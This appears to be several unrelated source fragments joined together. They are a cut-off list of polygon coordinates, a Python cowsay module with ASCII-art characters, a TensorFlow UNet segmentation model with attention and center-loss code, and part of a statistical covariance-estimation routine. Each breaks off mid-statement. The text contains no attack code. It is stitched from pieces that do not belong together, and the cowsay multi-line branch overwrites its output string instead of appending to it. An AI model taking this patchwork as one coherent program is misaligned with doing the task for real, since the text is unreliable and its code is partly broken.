-0.240306793531), (-0.00749141199938, -0.237333273502), (-0.00749179874882, -0.234359134297), (-0.00749218080159, -0.231384384046), (-0.00749255821387, -0.228409030867), (-0.00749293104204, -0.225433082861), (-0.00749329934251, -0.222456548115), (-0.00749366317177, -0.219479434703), (-0.00749402258637, -0.216501750682), (-0.0074943776427, -0.213523504097), (-0.00749472839703, -0.210544702979), (-0.00749507490553, -0.207565355345), (-0.00749541722408, -0.204585469199), (-0.00749575540829, -0.201605052531), (-0.00749608951347, -0.19862411332), (-0.00749641959453, -0.19564265953), (-0.00749674570591, -0.192660699116), (-0.00749706790165, -0.189678240017), (-0.00749738623523, -0.186695290162), (-0.0074977007595, -0.183711857468), (-0.00749801152679, -0.180727949841), (-0.00749831858874, -0.177743575175), (-0.00749862199626, -0.174758741353), (-0.00749892179957, -0.171773456246), (-0.00749921804805, -0.168787727716), (-0.00749951079032, -0.165801563615), (-0.00749980007416, -0.162814971782), (-0.00750008594633, -0.159827960048), (-0.00750036845284, -0.156840536235), (-0.00750064763858, -0.153852708152), (-0.00750092354758, -0.150864483603), (-0.00138730045512, -0.15086403347), (0.00472626736655, -0.150863103869), (0.0108397124665, -0.150861694614), (0.0169529675116, -0.150859805391), (0.0230659652855, -0.150857435762), (0.0291786386867, -0.150854585164), (0.0352909207265, -0.150851252913), (0.0414027445267, -0.150847438201), (0.0475140433172, -0.150843140102), (0.0536247504324, -0.150838357573), (0.0597347993085, -0.150833089453), (0.0658441234792, -0.150827334471), (0.0719526565719, -0.150821091242), (0.0780603323029, -0.150814358276), (0.0841670844731, -0.150807133975), (0.0902728469618, -0.150799416643), (0.0963775537219, -0.150791204483), (0.102481138773, -0.150782495602), (0.108583536196, -0.15077328802), (0.114684680123, -0.150763579665), (0.120784504736, -0.150753368385), (0.126882944253, -0.150742651948), (0.13297993292, -0.150731428045), (0.139075405009, -0.150719694301), (0.145169294799, -0.150707448272), (0.151261536575, -0.150694687455), (0.157352064613, -0.150681409291), (0.16344081317, -0.15066761117), (0.169527716473, -0.150653290437), (0.175612708711, -0.150638444395), (0.181695724016, -0.150623070314), (0.187776696458, -0.150607165433)]}, 34: {'color': 'violet', 'polygon': [(-0.0109948898159, -0.150885055847), (-0.0109926227084, -0.153873270396), (-0.0109903493576, -0.156861088346), (-0.0109880697254, -0.159848501893), (-0.010985783772, -0.162835503225), (-0.0109834914572, -0.16582208452), (-0.0109811927395, -0.168808237945), (-0.0109788875766, -0.171793955659), (-0.0109765759254, -0.174779229809), (-0.010974257742, -0.177764052533), (-0.0109719329815, -0.180748415958), (-0.0109696015986, -0.183732312199), (-0.0109672635468, -0.186715733361), (-0.0109649187794, -0.189698671538), (-0.0109625672488, -0.192681118811), (-0.0109602089068, -0.195663067252), (-0.0109578437049, -0.198644508917), (-0.0109554715938, -0.201625435854), (-0.0109530925239, -0.204605840097),
<reponame>rashid-nhm/cowsay<filename>cowsay.py #!/usr/bin/env python3 import random from enum import Enum ACKNOWLEDGEMENTS = """ cowsay for GNU/Linux was initially written in perl by <NAME> (<EMAIL>), with suggestions from <NAME> (<EMAIL>) and contributions from <NAME> (<EMAIL>). This code was originally written by: <NAME> https://pypi.org/project/cowsay/ https://github.com/VaasuDevanS/cowsay-python All base characters, newline logic is from his code! The code was updated by: <NAME> https://github.com/rashid-nhm/cowsay """ __author__ = "<NAME>" __name__ = "cowsay" __license__ = "MIT" __version__ = 2.0 max_line_len = 50 class CowString(str): def __init__(self, value): super().__init__() def __repr__(self): return super().__str__() class Characters(Enum): beavis = """ __------~~-, ,' , / \\ / : | ' | | | | | _-- | _| =-. .-. || o|/o/ _. | / ~ \\ | (____\@) ___~ | |_===~~~.` | _______.--~ | \\________ | \\ | __/-___-- -__ / _ \\ """ cheese = """ / \\_/ | | || | || | ###\\ /### | | | 0 \\/ 0 | | /| | | / | < |\\ \\ | /| | | | | | \\_______/ | | | | | | / / /|| /||| ----------------| | | | | *** *** /___\\ /___\\ """ daemon = """ /- _ `-/ ' (/\\/ \\ \\ /\\ / / | ` \\ O O ) / | `-^--'`< ' (_.) _ ) / `.___/` / `-----' / <----. __ / __ \\ <----|====O)))==) \\) /==== <----' `--' `.__,' \\ | | \\ / ______( (_ / \\______ ,' ,-----' | \\ `--{__________) \\/ """ cow = """ ^__^ (oo)\_______ (__)\ )\/\ ||----w | || || """ dragon = """ / \\ //\\ |\\___/| / \\// \\\\ /0 0 \\__ / // | \\ \\ / / \\/_/ // | \\ \\ \@_^_\@'/ \\/_ // | \\ \\ //_^_/ \\/_ // | \\ \\ ( //) | \\/// | \\ \\ ( / /) _|_ / ) // | \\ _\\ ( // /) '/,_ _ _/ ( ; -. | _ _\\.-~ .-~~~^-. (( / / )) ,-{ _ `-.|.-~-. .~ `. (( // / )) '/\\ / ~-. _ .-~ .-~^-. \\ (( /// )) `. { } / \\ \\ (( / )) .----~-.\\ \\-' .~ \\ `. \\^-. ///.----..> \\ _ -~ `. ^-` ^-_ ///-._ _ _ _ _ _ _}^ - - - - ~ ~-- ,.-~ /.-~ """ ghostbusters = """ __---__ _- /--______ __--( / \\ )XXXXXXXXXXX\\v. .-XXX( O O )XXXXXXXXXXXXXXX- /XXX( U ) XXXXXXX\\ /XXXXX( )--_ XXXXXXXXXXX\\ /XXXXX/ ( O ) XXXXXX \\XXXXX\\ XXXXX/ / XXXXXX \\__ \\XXXXX XXXXXX__/ XXXXXX \\__----> ---___ XXX__/ XXXXXX \\__ / \\- --__/ ___/\\ XXXXXX / ___--/= \\-\\ ___/ XXXXXX '--- XXXXXX \\-\\/XXX\\ XXXXXX /XXXXX \\XXXXXXXXX \\ /XXXXX/ \\XXXXXX > _/XXXXX/ \\XXXXX--__/ __-- XXXX/ -XXXXXXXX--------------- XXXXXX- \\XXXXXXXXXXXXXXXXXXXXXXXXXX/ ""VXXXXXXXXXXXXXXXXXXV"" """ kitty = """ ("`-' '-/") .___..--' ' "`-._ ` *_ * ) `-. ( ) .`-.__. `) (_Y_.) ' ._ ) `._` ; `` -. .-' _.. `--'_..-_/ /--' _ .' ,4 ( i l ),-'' ( l i),' ( ( ! .-' """ meow = """ _ ___.--'''`--''//-,-_--_. \\`"' ` || \\\\ \\ \\\\/ / // / ,-\\\\`,_ /'` \\ \\ || Y | \\|/ / // / - |__ `-, /\@"\\ ` \\ `\\ | | ||/ // | \\/ \\ `-._`-,_., / _.-. `.-\\,___/\\ _/|_/_\\_\\/|_/ | `-._._) `-'``/ / | // \\__/\\__ / \\__/ \\ `-' /-\\/ | -| \\__ \\ |-' | __/\\ / _/ \\/ __,-' ) ,' _|' (((__/(((_.' ((___..-'((__,' """ milk = """ ____________ |__________| / /\\ / / \\ /___________/___/| | | | | ==\\ /== | | | O O | \\ \\ | | < | \\ \\| /| | \\ \\ / | \\_____/ | / / / /| | / /| /||\\| | /||\\/ -------------| | | | | <__/ \\__> """ stegosaurus = """ / `. .' " .---. < > < > .---. | \\ \\ - ~ ~ - / / | _____ ..-~ ~-..-~ | | \\~~~\\.' `./~~~/ --------- \\__/ \\__/ .' O \\ / / \\ " (_____, `._.' | } \\/~~~/ `----. / } | / \\__/ `-. | / | / `. ,~~| ~-.__| /_ - ~ ^| /- _ `..-' | / | / ~-. `-. _ _ _ |_____| |_____| ~ - . _ _ _ _ _> """ stimpy = """ . _ . |\\_|/__/| / / \\/ \\ \\ /__|O||O|__ \\ |/_ \\_/\\_/ _\\ | | | (____) | || \\/\\___/\\__/ // (_/ || | || | ||\\ \\ //_/ \\______// __ || __|| (____(____) """ turkey = """ ,+*^^*+___+++_ ,*^^^^ ) _+* ^**+_ +^ _ _++*+_+++_, ) _+^^*+_ ( ,+*^ ^ \\+_ ) { ) ( ,( ,_+--+--, ^) ^\\ { (\@) } f ,( ,+-^ __*_*_ ^^\\_ ^\\ ) {:;-/ (_+*-+^^^^^+*+*<_ _++_)_ ) ) / ( / ( ( ,___ ^*+_+* ) < < \\ U _/ ) *--< ) ^\\-----++__) ) ) ) ( ) _(^)^^)) ) )\\^^^^^))^*+/ / / ( / (_))_^)) ) ) ))^^^^^))^^^)__/ +^^ ( ,/ (^))^)) ) ) ))^^^^^^^))^^) _) *+__+* (_))^) ) ) ))^^^^^^))^^^^^)____*^ \\ \\_)^)_)) ))^^^^^^^^^^))^^^^) (_ ^\\__^^^^^^^^^^^^))^^^^^^^) ^\\___ ^\\__^^^^^^))^^^^^^^^)\\\\ ^^^^^\\uuu/^^\\uuu/^^^^\\^\\^\\^\\^\\^\\^\\^\\ ___) >____) >___ ^\\_\\_\\_\\_\\_\\_\\) ^^^//\\\\_^^//\\\\_^ ^(\\_\\_\\_\\) ^^^ ^^ ^^^ ^ """ turtle = """ ___-------___ _-~~ ~~-_ _-~ /~-_ /^\\__/^\\ /~ \\ / \\ /| O|| O| / \\_______________/ \\ | |___||__| / / \\ \\ | \\ / / \\ \\ | (_______) /______/ \\_________ \\ | / / \\ / \\ \\ \\^\\\\ \\ / \\ / \\ || \\______________/ _-_ //\\__// \\ ||------_-~~-_ ------------- \\ --/~ ~\\ || __/ ~-----||====/~ |==================| |/~~~~~ (_(__/ ./ / \\_\\ \\. (_(___/ \\_____)_) """ tux = """ .--. |o_o | |:_/ | // \\ \\ (| | ) /'\\_ _/`\\ \\___)=(___/ """ def character_names(): return [character.name for character in Characters] def character_functions(): return [beavis, cheese, daemon, cow, dragon, ghostbusters, kitty, meow, milk, stegosaurus, stimpy, turkey, turtle, tux] def process_string(func): def string_processor(txt, *args, **kwargs): txt = str(txt) lines = [i.strip() for i in txt.split("\n") if len(i.strip()) != 0] if len(lines) == 1: line_len = len(lines[0]) if line_len <= max_line_len: ret_txt = f" {'_'*line_len}\n /{' '*line_len}\\\n< {lines[0]}{' '*(line_len - len(lines[0]) + 1)}>\n "\ f"{'='*line_len}\n" else: lines = list("".join(lines[0])) for i, line in enumerate(lines): if i and i % max_line_len == 0: lines.insert(i, "\n") return string_processor("".join(lines), *args, **kwargs) else: line_len = len(max(lines, key=len)) if all(len(line) <= max_line_len for line in lines): ret_txt = f" {'_'*line_len}\n /{' '*line_len}\\\n" for line in lines: ret_txt = f"| {line}{' '*(line_len-len(line)+1)}|\n" ret_txt += f" \\{' '*line_len}/\n {'='*line_len}\n" else: new_lines = [] for line in lines: if len(line) > max_line_len: joined_line = list("".join(line)) for i, char in enumerate(joined_line): if i and i % max_line_len == 0: joined_line.insert(i, "\n") new_lines.append("".join(joined_line)) else: new_lines.append(line + "\n") return string_processor("".join(new_lines), *args, **kwargs) return func(ret_txt, *args, max_line=line_len, **kwargs) return string_processor def apologize_if_fail_for(character_name): def apologize(func): def apology(*args, **kwargs): try: return func(*args, **kwargs) except: if not str(args[0]).strip(): return func(f"You didn't actually give {character_name} anything to say...") return func(f"I was not able to parse and say what you wanted. Please give {character_name} something " f"easier or different") return apology return apologize @process_string def __say(txt, base_character, max_line=max_line_len, left_pad=0): for i in range(5, 9): txt += " " * (max_line + i) + "\\\n" base_char_lines = [line for line in base_character.value.split("\n") if len(line) != 0] for line in base_char_lines: txt += " " * (max_line + left_pad) + line + "\n" return CowString(txt) @apologize_if_fail_for("beavis") def beavis(txt): return __say(txt, Characters.beavis, left_pad=7) @apologize_if_fail_for("cheese") def cheese(txt): return __say(txt, Characters.cheese, left_pad=3) @apologize_if_fail_for("daemon") def daemon(txt): return __say(txt, Characters.daemon, left_pad=-2) @apologize_if_fail_for("cow") def cow(txt): return __say(txt, Characters.cow, left_pad=10) @apologize_if_fail_for("dragon") def dragon(txt): return __say(txt, Characters.dragon, left_pad=0) @apologize_if_fail_for("ghostbusters") def ghostbusters(txt): return __say(txt, Characters.ghostbusters, left_pad=0) @apologize_if_fail_for("kitty") def kitty(txt): return __say(txt, Characters.kitty, left_pad=3) @apologize_if_fail_for("meow") def meow(txt): return __say(txt, Characters.meow, left_pad=3) @apologize_if_fail_for("milk") def milk(txt): return __say(txt, Characters.milk, left_pad=3) @apologize_if_fail_for("stegosaurus") def stegosaurus(txt): return __say(txt, Characters.stegosaurus, left_pad=0) @apologize_if_fail_for("stimpy") def stimpy(txt): return __say(txt, Characters.stimpy, left_pad=7) @apologize_if_fail_for("turkey") def turkey(txt): return __say(txt, Characters.turkey, left_pad=2) @apologize_if_fail_for("turtle") def turtle(txt): return __say(txt, Characters.turtle, left_pad=5) @apologize_if_fail_for("tux") def tux(txt): return __say(txt, Characters.tux, left_pad=5) @apologize_if_fail_for("me") def say(txt): return __say(txt, Characters.cow, left_pad=10) def
<gh_stars>0 # -*- coding=utf-8 -*- # weakly label version import tensorflow as tf from OHEM import OHNM_batch import numpy as np slim = tf.contrib.slim MODEL_TYPE_vgg16 = 'vgg16' MODEL_TYPE_vgg16_no_dilation = 'vgg16_no_dilation' dice_coff = 0.5 ms_flag = False FUSE_TYPE_cascade_conv1x1_upsample_sum = 'cascade_conv1x1_upsample_sum' FUSE_TYPE_cascade_conv1x1_128_upsamle_sum_conv1x1_2 = \ 'cascade_conv1x1_128_upsamle_sum_conv1x1_2' FUSE_TYPE_cascade_conv1x1_128_upsamle_concat_conv1x1_2 = \ 'cascade_conv1x1_128_upsamle_concat_conv1x1_2' skip_connection_setting = { 'vgg16': ['conv1_2','conv2_2', 'conv3_3', 'conv4_3', 'fc7'], 'res50': [], } def compute_EDM_tf(tensor): ''' 计算tensor的欧式距离 :param tensor: N*C :return: N*N ''' shape = tensor.get_shape().as_list() G = tf.matmul(tensor, tf.transpose(tensor, perm=[1, 0])) diag_tensor = tf.expand_dims(tf.diag_part(G), axis=0) H = tf.tile(diag_tensor, [shape[0], 1]) D = tf.sqrt(H + tf.transpose(H, perm=[1, 0]) - 2. * G) return D class GlobalSimilarityAttention: def __init__(self, feature_map, name, arg_sc): ''' :param feature_map: N * H * W * C :param name: :param arg_sc: ''' with tf.variable_scope(name): with slim.arg_scope(arg_sc): shape = feature_map.get_shape().as_list() feature_map = tf.reshape(feature_map, [shape[0], -1, shape[-1]]) distance = tf.map_fn(lambda feature: compute_EDM_tf(feature), feature_map) print('distance is ', distance) alpha = tf.sigmoid(distance) print('the similarity matrix is ', alpha) print('the feature_map is ', feature_map) o = tf.matmul(alpha, feature_map) print('delta feature is ', o) beta = tf.get_variable('beta', [], dtype=tf.float32, initializer=tf.constant_initializer(0.0)) feature_map = beta * o + feature_map feature_map = tf.reshape(feature_map, shape) self.output_feature_map = feature_map class LocalSimilarityAttention: def __init__(self, feature_map, k, name, arg_sc): with tf.variable_scope(name): with slim.arg_scope(arg_sc): shape = feature_map.get_shape().as_list() cropped_feature_map = feature_map[:, k//2:shape[1]-k//2, k//2:shape[2]-k//2, :] cropped_feature_map = tf.reshape(cropped_feature_map, [shape[0], -1, shape[-1]]) patches = tf.extract_image_patches(feature_map, ksizes=[1, k, k, 1], strides=[1, 1, 1, 1], rates=[1, 1, 1, 1], padding='VALID') patches_shape = patches.get_shape().as_list() patches = tf.reshape(patches, [patches_shape[0], -1, k * k, shape[-1]]) patches = tf.transpose(patches, perm=[0, 2, 1, 3]) print('the patches is ', patches) print('the cropped_feature_map is ', cropped_feature_map) # 计算每个pixel和相邻的pixel 特征之间的距离 distance = tf.map_fn( lambda (feature_example, patch_example): tf.map_fn( lambda patch_neighbor: tf.reduce_sum((feature_example - patch_neighbor) ** 2, axis=-1), patch_example), [cropped_feature_map, patches], dtype=tf.float32) print('distance is ', distance) alpha = tf.sigmoid(distance) o = tf.reduce_sum(patches * tf.expand_dims(alpha, axis=3), axis=1) beta = tf.get_variable('beta', [], tf.float32, initializer=tf.constant_initializer(0.0)) cropped_feature_map = o * beta + cropped_feature_map print 'cropped_feature_map is ', cropped_feature_map output_feature_map = tf.reshape(cropped_feature_map, [shape[0], shape[1]-k+1, shape[2]-k+1, shape[3]]) output_feature_map = tf.image.resize_images(output_feature_map, [shape[1], shape[2]]) print('output_feature_map is ', output_feature_map) self.output_feature_map = output_feature_map def transpose2D(input_tensor, upsample_rate, transpose_kernel_size, use_batchnorm, is_training): print('decoder is tranpose2D') input_shape = input_tensor.get_shape().as_list() output = slim.conv2d_transpose(input_tensor, num_outputs=input_shape[-1], kernel_size=transpose_kernel_size, stride=upsample_rate, biases_initializer=None) if use_batchnorm: output = slim.batch_norm(output, is_training=is_training) output = tf.nn.relu(output) return output def upsampling2D(input_tensor, upsample_rate): print('decoder is upsampling2D') input_shape = input_tensor.get_shape().as_list() return tf.image.resize_images(input_tensor, [input_shape[1] * upsample_rate, input_shape[2] * upsample_rate]) class TaskNetworkModuleV2(object): ''' 对比上一个版本,本版本有multi scale 的功能 ''' def __init__(self, input_tensors, output_dim, output_shape, arg_sc, name, decoder='upsampling', is_training=True, hidden_dim=128): last_output = None # regularizer = tf.contrib.layers.l2_regularizer(scale=0.01) # 从深层到浅层 final_output = [] learnable_merged_flag = True different_scale_outputs = [] with tf.variable_scope(name): with slim.arg_scope(arg_sc): for idx, input_tensor in enumerate(input_tensors): if last_output is not None: if learnable_merged_flag: alpha = tf.get_variable('alpha_' + str(idx), shape=[], dtype=tf.float32, initializer=tf.ones_initializer(), regularizer=None) tf.summary.scalar('alpha_' + str(idx), alpha) if decoder == 'upsampling': last_output = upsampling2D(last_output, 2) elif decoder == 'transpose': last_output = transpose2D(last_output, 2, (4, 4), True, is_training=is_training) print('the last output is ', last_output) print('the output is ', input_tensor) if learnable_merged_flag: output = tf.concat([input_tensor, alpha * last_output], axis=-1) else: output = tf.concat([input_tensor, last_output], axis=-1) else: output = input_tensor output = slim.conv2d(output, hidden_dim, kernel_size=1, stride=1, scope='level_' + str(idx) + '_1x1') output = slim.conv2d(output, hidden_dim, kernel_size=3, stride=1, scope='level_' + str(idx) + '_3x3') last_output = output different_scale_outputs.append(last_output) final_output.append(tf.image.resize_images(output, output_shape)) final_output = slim.conv2d(tf.concat(final_output, -1), hidden_dim * len(input_tensors) / 2, kernel_size=1, stride=1, scope='merged_1x1') final_output = slim.conv2d(final_output, hidden_dim * len(input_tensors) / 2, kernel_size=3, stride=1, scope='merged_3x3') local_similarity_attention = LocalSimilarityAttention(final_output, k=3, name='final_out', arg_sc=arg_sc) final_output = local_similarity_attention.output_feature_map self.final_feature_map = final_output final_output = slim.conv2d(final_output, output_dim, kernel_size=1, stride=1, scope='logits', activation_fn=None, normalizer_fn=None) self.output = final_output class UNet(object): def __init__(self, inputs, mask_input, is_training, base_model='vgg16', decoder='upsampling', update_center_flag=False, batch_size=4, init_center_value=None, similarity_alpha=1.0, update_center_strategy=1): self.inputs = inputs self.is_training = is_training self.mask_input = mask_input self.base_model = base_model self.decoder = decoder self.batch_size = batch_size self.num_classes = 2 self.hidden_dim = 128 self.img_size = 256 self.stride = 1 self.recovery_channal = 1 self.similarity_alpha = similarity_alpha self.update_center_flag = update_center_flag self.init_center_value = init_center_value self.update_center_strategy = update_center_strategy self._build_network() self._up_down_layers() self._logits_to_scores() # if self.update_center_flag: # self._compute_qij() # self._compute_pij() def _build_network(self): import config if config.model_type == MODEL_TYPE_vgg16: from nets import vgg with slim.arg_scope([slim.conv2d], activation_fn=tf.nn.relu, weights_regularizer=slim.l2_regularizer(config.weight_decay), weights_initializer=tf.contrib.layers.xavier_initializer(), biases_initializer=tf.zeros_initializer()): with slim.arg_scope([slim.conv2d, slim.max_pool2d], padding='SAME') as sc: self.arg_scope = sc self.net, self.end_points = vgg.basenet( inputs=self.inputs, pooling='MAX') elif config.model_type == MODEL_TYPE_vgg16_no_dilation: from nets import vgg with slim.arg_scope([slim.conv2d], activation_fn=tf.nn.relu, weights_regularizer=slim.l2_regularizer(config.weight_decay), weights_initializer=tf.contrib.layers.xavier_initializer(), biases_initializer=tf.zeros_initializer()): with slim.arg_scope([slim.conv2d, slim.max_pool2d], padding='SAME') as sc: self.arg_scope = sc self.net, self.end_points = vgg.basenet( inputs=self.inputs, dilation=False, pooling='MAX') else: raise ValueError('model_type not supported:%s' % (config.model_type)) def _up_down_layers(self): import config input_tensors = [] for idx in range(0, len(skip_connection_setting[self.base_model]))[::-1]: # [4, 3, 2, 1, 0] print('basemode: ', self.base_model) current_layer_name = skip_connection_setting[self.base_model][idx] current_layer = self.end_points[current_layer_name] input_tensors.append(current_layer) # 针对每个pixel进行分类,区分前景背景 pixel_cls_module = TaskNetworkModuleV2(input_tensors, config.num_classes, [self.img_size / self.stride, self.img_size / self.stride], self.arg_scope, name='pixel_cls', is_training=self.is_training, decoder=self.decoder, hidden_dim=self.hidden_dim) # 试图恢复pixel的值,提取real feature map,用于计算相似度 pixel_recovery_module = TaskNetworkModuleV2(input_tensors, self.recovery_channal, [self.img_size / self.stride, self.img_size / self.stride], self.arg_scope, name='pixel_recovery', is_training=self.is_training, decoder=self.decoder, hidden_dim=self.hidden_dim) self.pixel_cls_logits = pixel_cls_module.output self.pixel_recovery_logits = pixel_recovery_module.output self.pixel_recovery_features = pixel_recovery_module.final_feature_map self.pixel_recovery_features_num_channal = self.pixel_recovery_features.get_shape().as_list()[-1] # build center if self.update_center_flag and self.init_center_value is not None: self.centers = tf.get_variable('centers', [self.num_classes, self.pixel_recovery_features_num_channal], dtype=tf.float32, initializer=lambda shape, dtype, partition_info: np.asarray( self.init_center_value, np.float32), trainable=False) else: self.centers = tf.get_variable('centers', [self.num_classes, self.pixel_recovery_features_num_channal], dtype=tf.float32, initializer=tf.truncated_normal_initializer(), trainable=False) tf.summary.scalar('sum_centers', tf.reduce_sum(self.centers)) # tf.summary.histogram('centers', self.centers) if self.stride != 1: self.pixel_cls_logits = tf.image.resize_images(self.pixel_cls_logits, [self.img_size, self.img_size]) self.pixel_recovery_logits = tf.image.resize_images(self.pixel_recovery_logits, [self.img_size, self.img_size]) def _flat_pixel_values(self, values): shape = values.shape.as_list() values = tf.reshape(values, shape=[shape[0], -1, shape[-1]]) return values def _logits_to_scores(self): self.pixel_cls_scores = tf.nn.softmax(self.pixel_cls_logits) # self.pixel_recovery_value = tf.nn.sigmoid(self.pixel_recovery_logits) self.pixel_recovery_value = self.pixel_recovery_logits tf.summary.image('pred_mask', tf.expand_dims(self.pixel_cls_scores[:, :, :, 1], axis=3) * 200.0, max_outputs=1) tf.summary.image('image', self.inputs, max_outputs=1) tf.summary.scalar('max_image', tf.reduce_max(self.inputs)) tf.summary.image('recovery_image', self.pixel_recovery_value, max_outputs=1) tf.summary.scalar('max_recovery_image', tf.reduce_max(self.pixel_recovery_value)) tf.summary.scalar('min_recovery_image', tf.reduce_min(self.pixel_recovery_value)) if self.mask_input is not None: tf.summary.image('mask', self.mask_input * 200, max_outputs=1) self.pixel_cls_logits_flatten = \ self._flat_pixel_values(self.pixel_cls_logits) self.pixel_recovery_logits_flatten = self._flat_pixel_values(self.pixel_recovery_logits) self.pixel_cls_scores_flatten = \ self._flat_pixel_values(self.pixel_cls_scores) self.pixel_recovery_value_flatten = self._flat_pixel_values(self.pixel_recovery_value) def _get_weakly_label_loss(self): ''' 总体上来说还是l2 loss,是为了让类内更加聚集 :return: ''' # pixel_recovery_features = tf.nn.sigmoid(self.pixel_recovery_features) pixel_recovery_features = self.pixel_recovery_features distance = tf.map_fn( lambda center_feature: tf.reduce_sum((pixel_recovery_features - center_feature) ** 2, axis=-1), self.centers, dtype=tf.float32) assign_label = tf.argmin(distance, axis=0) vis_tensor = assign_label + 1 vis_tensor = tf.cast(vis_tensor * tf.cast(tf.logical_or(self.pos_mask, self.selected_neg_mask), tf.int64) * 100, tf.uint8) tf.summary.image('assign_label', tf.expand_dims(vis_tensor, axis=3), max_outputs=1) assign_label = tf.stop_gradient(assign_label) assign_features = tf.gather(self.centers, assign_label) l2loss = tf.reduce_sum((assign_features - pixel_recovery_features) ** 2, axis=-1) l2loss_pos = l2loss * tf.cast(self.pos_mask, tf.float32) l2loss_neg = l2loss * tf.cast(self.selected_neg_mask, tf.float32) l2loss = l2loss_pos + l2loss_neg l2loss = tf.reduce_sum(l2loss) / ( tf.reduce_sum(tf.cast(self.pos_mask, tf.float32)) + tf.reduce_sum( tf.cast(self.selected_neg_mask, tf.float32))) return l2loss def update_centers_V2(self): ''' 计算pos area和neg area 的feature 均值,根据此更新center 相当于针对每个batch,我们都有一个center,避免不同sample之间,病灶有所差异 :return: ''' # TODO: 扩展到每个simple都更新一个center,然后再去计算loss pos_features = tf.gather_nd(self.pixel_recovery_features, tf.where(self.pos_mask)) neg_features = tf.gather_nd(self.pixel_recovery_features, tf.where(self.selected_neg_mask)) pos_features = tf.reduce_mean(pos_features, axis=0, keepdims=True) neg_features = tf.reduce_mean(neg_features, axis=0, keepdims=True) updated_feature = tf.concat([pos_features, neg_features], axis=0) center_update_op = tf.assign(self.centers, updated_feature) return center_update_op def update_centers(self, alpha): ''' 采用center loss的更新策略 :param alpha: :return: ''' # pixel_recovery_features = tf.nn.sigmoid(self.pixel_recovery_features) pixel_recovery_features = self.pixel_recovery_features distance = tf.map_fn( lambda center_feature: tf.reduce_sum((pixel_recovery_features - center_feature) ** 2, axis=-1), self.centers, dtype=tf.float32) assign_label = tf.argmin(distance, axis=0) prior_cond = tf.logical_or(self.pos_mask, self.selected_neg_mask) # select_cond0 = tf.logical_and(prior_cond, tf.equal(assign_label, 0)) # select_cond1 = tf.logical_and(prior_cond, tf.equal(assign_label, 1)) # zero_mean_feature = tf.gather_nd(pixel_recovery_features, tf.where(select_cond0)) # one_mean_feature = tf.gather_nd(pixel_recovery_features, tf.where(select_cond1)) # zero_mean_feature = tf.reduce_mean(zero_mean_feature, keepdims=True, axis=0) # zero_mean_feature = tf.where(tf.equal(tf.shape(zero_mean_feature)[0], 0), # tf.expand_dims(self.centers[0], axis=0), zero_mean_feature) # # one_mean_feature = tf.reduce_mean(one_mean_feature, keepdims=True, axis=0) # one_mean_feature = tf.where(tf.equal(tf.shape(one_mean_feature)[0], 0), tf.expand_dims(self.centers[1], axis=0), # one_mean_feature) # print zero_mean_feature, one_mean_feature # updated_feature = tf.concat([zero_mean_feature, one_mean_feature], axis=0) # centers_update_op = tf.assign(self.centers, updated_feature) assign_label = tf.gather_nd(assign_label, tf.where(prior_cond)) assign_features = tf.gather(self.centers, assign_label) pred_features = tf.gather_nd(pixel_recovery_features, tf.where(prior_cond)) diff = assign_features - pred_features unique_label, unique_idx, unique_count = tf.unique_with_counts(assign_label) appear_times = tf.gather(unique_count, unique_idx) diff = diff / tf.expand_dims(tf.cast(1 + appear_times, tf.float32), axis=1) diff = alpha * diff centers_update_op = tf.scatter_sub(self.centers, assign_label, diff) return centers_update_op def _compute_qij(self): similarity_abs = tf.map_fn( lambda center: tf.pow( (1 + tf.reduce_sum(tf.square(self.pixel_recovery_features - center), axis=3) / self.similarity_alpha), (self.similarity_alpha + 1.) / 2. * -1.0), self.centers) print 'similarity_abs is ', similarity_abs print 'centers is ', self.centers similarity_abs = tf.transpose(similarity_abs, [1, 2, 3, 0]) similarity_rel = similarity_abs / tf.reduce_sum(similarity_abs, axis=3, keepdims=True) # 相对相似距离 self.qij = similarity_rel def _compute_pij(self): # fj = tf.transpose(tf.reduce_sum(self.qij, axis=[0, 1, 2], keepdims=True), [3, 0, 1, 2]) fj = tf.reduce_sum(self.qij, axis=[0, 1, 2]) print 'fj is ', fj print 'self.qij transpose is ', tf.transpose(self.qij, [3, 0, 1, 2]) pij_abs = tf.map_fn(lambda (single_fj, single_qij): tf.div(tf.square(single_qij), single_fj), (fj, tf.transpose(self.qij, [3, 0, 1, 2])), dtype=tf.float32) pij_abs = tf.transpose(pij_abs,
N_k W_nk = 1. Actual row sum for sample %d was %f' % (firstbad, row_sums[firstbad])) # Compute estimate of asymptotic covariance matrix using specified method. if method == 'generalized-inverse': # Use generalized inverse (Eq. 8 of [1]) -- most general # Theta = W' (I - W N W')^+ W # Construct matrices Ndiag = numpy.matrix(numpy.diag(N_k), dtype=numpy.float64) # Diagonal N_k matrix. W = numpy.matrix(W, dtype=numpy.float64) I = numpy.identity(N, dtype=numpy.float64) # Compute covariance Theta = W.T * self._pseudoinverse(I - W * Ndiag * W.T) * W elif method == 'inverse': # Use standard inverse method (Eq. D8 of [1]) -- only applicable if all K states are different # Theta = [(W'W)^-1 - N + 1 1'/N]^-1 # Construct matrices Ndiag = numpy.matrix(numpy.diag(N_k), dtype=numpy.float64) # Diagonal N_k matrix. W = numpy.matrix(W, dtype=numpy.float64) I = numpy.identity(N, dtype=numpy.float64) O = numpy.ones([K,K], dtype=numpy.float64) / float(N) # matrix of ones, times 1/N # Make sure W is nonsingular. if (abs(numpy.linalg.det(W.T * W)) < tolerance): print "Warning: W'W appears to be singular, yet 'inverse' method of uncertainty estimation requires W contain no duplicate states." # Compute covariance Theta = ( (W.T * W).I - Ndiag + O).I elif method == 'approximate': # Use fast approximate expression from Kong et al. -- this underestimates the true covariance, but may be a good approximation in some cases and requires no matrix inversions # Theta = P'P # Construct matrices W = numpy.matrix(W, dtype=numpy.float64) # Compute covariance Theta = W.T * W elif method == 'svd': # Use singular value decomposition based approach given in supplementary material to efficiently compute uncertainty # See Appendix D.1, Eq. D4 in [1]. # Construct matrices Ndiag = numpy.matrix(numpy.diag(N_k), dtype=numpy.float64) W = numpy.matrix(W, dtype=numpy.float64) I = numpy.identity(K, dtype=numpy.float64) # Compute SVD of W [U, S, Vt] = numpy.linalg.svd(W) Sigma = numpy.matrix(numpy.diag(S)) V = numpy.matrix(Vt).T # Compute covariance Theta = V * Sigma * self._pseudoinverse(I - Sigma * V.T * Ndiag * V * Sigma) * Sigma * V.T elif method == 'svd-ew': # Use singular value decomposition based approach given in supplementary material to efficiently compute uncertainty # The eigenvalue decomposition of W'W is used to forego computing the SVD. # See Appendix D.1, Eqs. D4 and D5 of [1]. # Construct matrices Ndiag = numpy.matrix(numpy.diag(N_k), dtype=numpy.float64) W = numpy.matrix(W, dtype=numpy.float64) I = numpy.identity(K, dtype=numpy.float64) # 